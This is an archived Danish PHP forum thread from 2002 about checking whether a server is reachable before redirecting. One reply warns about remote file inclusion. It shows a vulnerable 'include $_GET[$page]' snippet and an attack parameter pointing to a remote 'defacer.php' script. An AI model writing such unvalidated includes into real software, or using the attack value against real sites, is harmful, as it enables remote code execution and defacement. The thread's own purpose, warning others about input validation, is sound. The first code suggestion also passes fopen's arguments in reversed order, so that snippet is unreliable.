/ Forside / Teknologi / Udvikling / PHP / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
PHP
#NavnPoint
rfh 3959
natmaden 3372
poul_from 3310
funbreak 2700
stone47 2230
Jin2k 1960
Angband 1743
Bjerner 1249
refi 1185
10  Interkril.. 1146
Check om bestemt IP er tilgængelig inden r~
Fra : Michael Alø-Nielsen


Dato : 01-12-02 08:05

Kan dette lade sig gøre?
Og hvordan gør jeg i praksis?

Hvordan checker jeg om en bestemt IP-adresse er tilgængelig inden jeg
redirecter?
Hvis IP-adressen er tilgængelig skal jeg redirecte til et dokument på denne
IP.
Hvis ikke IP-adressen er tilgængelig, skal der ikke redirectes.

/Michael.



 
 
Henning Petersen (01-12-2002)
Kommentar
Fra : Henning Petersen


Dato : 01-12-02 20:43

On Sun, 1 Dec 2002 08:04:44 +0100, "Michael Alø-Nielsen"
<m-alo@nospam.dk> wrote:

> Kan dette lade sig gøre?
> Og hvordan gør jeg i praksis?
>
> Hvordan checker jeg om en bestemt IP-adresse er tilgængelig inden jeg
> redirecter?
> Hvis IP-adressen er tilgængelig skal jeg redirecte til et dokument på denne
> IP.
> Hvis ikke IP-adressen er tilgængelig, skal der ikke redirectes.

En mulighed er at hvis du vil redirecte til
   www.domain.dk/en_speciel_side.html

så forsøger du at læse siden i php:

if ($fp = @fopen("r","http://www.domain.dk/en_speciel_side.html")) {
   fclose($fp);
   // redirect ok
   header("Location: http://www.domain.dk/en_speciel_side.html");
}

Jeg har ikke testet det, men det burde virke i princippet.

--
Venlig hilsen / Best regards
   Henning

_H_P_C_o_n_s_u_l_t_ http://www.hpc.dk
Skoletoften 9, Blans http://www.turnsys.dk
DK - 6400 Soenderborg

Henrik Stidsen (01-12-2002)
Kommentar
Fra : Henrik Stidsen


Dato : 01-12-02 22:39

Henning Petersen <henning.petersen.021130@hpc.dk> wrote in
news:cdpkuucpq5p56aask3ia6djod88514n852@4ax.com

> if ($fp =
> @fopen("r","http://www.domain.dk/en_speciel_side.html")) {
> fclose($fp);
> // redirect ok
> header("Location:
> http://www.domain.dk/en_speciel_side.html");
> }

Virker bare ikke hvis PHP har disablet at fopen kan åbne URL's - det
gøres nogle steder som sikkerhedsfeature.

--
Henrik Stidsen | HS235-DK | Ikke eksisterende samleobjekt/undtagelse
"I am a nobody, and nobody is perfect; therefore I am perfect."
http://hs235.dk | @spammer.dk <- spamfri emailadresse ;)

Henning Petersen (02-12-2002)
Kommentar
Fra : Henning Petersen


Dato : 02-12-02 15:45

On Sun, 1 Dec 2002 21:38:56 +0000 (UTC), Henrik Stidsen
<spamtrap@spammer.dk> wrote:

> Henning Petersen <henning.petersen.021130@hpc.dk> wrote in
> news:cdpkuucpq5p56aask3ia6djod88514n852@4ax.com
>
> > if ($fp =
> > @fopen("r","http://www.domain.dk/en_speciel_side.html")) {
> > fclose($fp);
> > // redirect ok
> > header("Location:
> > http://www.domain.dk/en_speciel_side.html");
> > }
>
> Virker bare ikke hvis PHP har disablet at fopen kan åbne URL's - det
> gøres nogle steder som sikkerhedsfeature.

Ja det er slevfølgelig et problem som heldigvis endnu ikke er stødt in
i. Men derud over virker det vist alligevel


--
Venlig hilsen / Best regards
   Henning

_H_P_C_o_n_s_u_l_t_ http://www.hpc.dk
Skoletoften 9, Blans http://www.turnsys.dk
DK - 6400 Soenderborg

Henrik Stidsen (03-12-2002)
Kommentar
Fra : Henrik Stidsen


Dato : 03-12-02 00:35

Henning Petersen <henning.petersen.021202@hpc.dk> wrote in
news:kdsmuu8e9nbui6207ehjl4uq83510m830v@4ax.com

>> Virker bare ikke hvis PHP har disablet at fopen kan åbne URL's
>> - det gøres nogle steder som sikkerhedsfeature.
>
> Ja det er slevfølgelig et problem som heldigvis endnu ikke er
> stødt in i. Men derud over virker det vist alligevel

Jeg har ikke undersøgt om det er opsat sådan på de webhoteller jeg
har adgang til. Med lidt omtanke er det heller ikke nødvendigt. Man
skal for alt i verden sørge for at checke på input der angiver en fil
der skal inluderes, hvis fopen og include kan hente filer fra andre
servere har man åbnet døren på noget nær vid gab hvis man ikke
checker inputtet ordentligt.

--
Henrik Stidsen | HS235-DK | Ikke eksisterende samleobjekt/undtagelse
"I am a nobody, and nobody is perfect; therefore I am perfect."
http://hs235.dk | @spammer.dk <- spamfri emailadresse ;)

Henning Petersen (03-12-2002)
Kommentar
Fra : Henning Petersen


Dato : 03-12-02 20:52

On Mon, 2 Dec 2002 23:34:33 +0000 (UTC), Henrik Stidsen
<spamtrap@spammer.dk> wrote:

> Henning Petersen <henning.petersen.021202@hpc.dk> wrote in
> news:kdsmuu8e9nbui6207ehjl4uq83510m830v@4ax.com
>
> >> Virker bare ikke hvis PHP har disablet at fopen kan åbne URL's
> >> - det gøres nogle steder som sikkerhedsfeature.
> >
> > Ja det er slevfølgelig et problem som heldigvis endnu ikke er
> > stødt in i. Men derud over virker det vist alligevel
>
> Jeg har ikke undersøgt om det er opsat sådan på de webhoteller jeg
> har adgang til. Med lidt omtanke er det heller ikke nødvendigt. Man
> skal for alt i verden sørge for at checke på input der angiver en fil
> der skal inluderes, hvis fopen og include kan hente filer fra andre
> servere har man åbnet døren på noget nær vid gab hvis man ikke
> checker inputtet ordentligt.

Principielt ja., men det eneste min stump kode gør er at åben en side.
Der laves jo _intet_ ved inputtet - det læses jo end ikke ind fra
"file", så det burde efter min bedste overbevisning ikke være et
problem.

Men hvis der er nogen som har argumenter på det modsatte er jeg meget
lydhør, da jeg selv har tænkt på at lave en lignende løsning i
forbindelse med en redir.

--
Venlig hilsen / Best regards
   Henning

_H_P_C_o_n_s_u_l_t_ http://www.hpc.dk
Skoletoften 9, Blans http://www.turnsys.dk
DK - 6400 Soenderborg

Henrik Stidsen (03-12-2002)
Kommentar
Fra : Henrik Stidsen


Dato : 03-12-02 23:58

Henning Petersen <henning.petersen.021203@hpc.dk> wrote in
news:ap2quucrles3vn49reef1nkq5s53bu842b@4ax.com

> Principielt ja., men det eneste min stump kode gør er at åben en
> side. Der laves jo _intet_ ved inputtet - det læses jo end ikke
> ind fra "file", så det burde efter min bedste overbevisning ikke
> være et problem.

Det lyder jo godt nok - nævnte det også bare lige for en sikkerheds
skyld. Der var en der i en gruppe nævnte at hans side var blevet
defaced pga. sådan en fejl!

> Men hvis der er nogen som har argumenter på det modsatte er jeg
> meget lydhør, da jeg selv har tænkt på at lave en lignende
> løsning i forbindelse med en redir.

Så skal vi nok se på din kode :)

--
Henrik Stidsen | HS235-DK | Ikke eksisterende samleobjekt/undtagelse
"I am a nobody, and nobody is perfect; therefore I am perfect."
http://hs235.dk | @spammer.dk <- spamfri emailadresse ;)

Henning Petersen (05-12-2002)
Kommentar
Fra : Henning Petersen


Dato : 05-12-02 16:54

On Tue, 3 Dec 2002 22:58:23 +0000 (UTC), Henrik Stidsen
<spamtrap@spammer.dk> wrote:

> Henning Petersen <henning.petersen.021203@hpc.dk> wrote in
> news:ap2quucrles3vn49reef1nkq5s53bu842b@4ax.com
>
> > Principielt ja., men det eneste min stump kode gør er at åben en
> > side. Der laves jo _intet_ ved inputtet - det læses jo end ikke
> > ind fra "file", så det burde efter min bedste overbevisning ikke
> > være et problem.
>
> Det lyder jo godt nok - nævnte det også bare lige for en sikkerheds
> skyld. Der var en der i en gruppe nævnte at hans side var blevet
> defaced pga. sådan en fejl!

Hvis man bruger indholdet, af siden er det selvfølgelig nødvendigt at
validere, men i koden jeg postede tidligere lavede jeg blot en fopen()
og efterfølgende fclose() for at se om der var hul.

Det kan jeg ikke se der skulle være problemer i.

Ikke andet end at siden der hentes pludselig bliver lavet _meget_
stor, men umiddelbart burde det vel ikke give andre problemer end at
der sluges en masse hukommelse, som efterfølgende frigives igen.
- eller tager jeg fejl?

> Så skal vi nok se på din kode :)

Er posted tidligere i tråden.

--
Venlig hilsen / Best regards
   Henning

_H_P_C_o_n_s_u_l_t_ http://www.hpc.dk
Skoletoften 9, Blans http://www.turnsys.dk
DK - 6400 Soenderborg

Henrik Stidsen (05-12-2002)
Kommentar
Fra : Henrik Stidsen


Dato : 05-12-02 23:59

Henning Petersen <henning.petersen.021205@hpc.dk> wrote in
news:9dtuuu88grip9rhvhrh5qmimegqng9vum7@4ax.com

> - eller tager jeg fejl?

Nej, problemet er hvis der laves en kode i stil med:

<?php
// Hent tekst til siden
include $_GET[$page];
?>

Her regner man med at ?page=indholdsfil. Hvis man så, i
adresselinien, sætter ?page=http://hackers.org/defacer.php kan du
måske gætte hvad der sker :)

Har engang mødt en der var på grænsen, det var muligt at indlæse
index i index - altså et uendeligt loop...

--
Henrik Stidsen | HS235-DK | Ikke eksisterende samleobjekt/undtagelse
"I am a nobody, and nobody is perfect; therefore I am perfect."
http://hs235.dk | @spammer.dk <- spamfri emailadresse ;)

Henning Petersen (16-12-2002)
Kommentar
Fra : Henning Petersen


Dato : 16-12-02 13:44

On Thu, 5 Dec 2002 22:58:39 +0000 (UTC), Henrik Stidsen
<spamtrap@spammer.dk> wrote:

> Henning Petersen <henning.petersen.021205@hpc.dk> wrote in
> news:9dtuuu88grip9rhvhrh5qmimegqng9vum7@4ax.com
>
> > - eller tager jeg fejl?
>
> Nej, problemet er hvis der laves en kode i stil med:
>
> <?php
> // Hent tekst til siden
> include $_GET[$page];
> ?>
>

Helt enig.


--
Venlig hilsen / Best regards
   Henning

_H_P_C_o_n_s_u_l_t_ http://www.hpc.dk
Skoletoften 9, Blans http://www.turnsys.dk
DK - 6400 Soenderborg

Michael Alø-Nielsen (02-12-2002)
Kommentar
Fra : Michael Alø-Nielsen


Dato : 02-12-02 08:19

"Michael Alø-Nielsen" <m-alo@nospam.dk> skrev i en meddelelse
news:asccac$bli$1@sunsite.dk...

> Kan dette lade sig gøre?
> Og hvordan gør jeg i praksis?

Tak for jeres forslag, men jeg fandt en løsning der virkede for mig
andetsteds... Jeg gjorde det at jeg oprettede en tekstfil (check.txt) på
serveren jeg vil redirecte til, og der hvor der skal redirectes fra bruger
jeg så følgende kode:

<?
$check = @file("http://min-ip/check.txt");
if (is_array($check)){
header("location: http://min-ip/");
} else {
echo "Siden er ikke tilgængelig!";
}
?>

/Michael.



Søg
Reklame
Statistik
Spørgsmål : 177559
Tips : 31968
Nyheder : 719565
Indlæg : 6408937
Brugere : 218888

Månedens bedste
Årets bedste
Sidste års bedste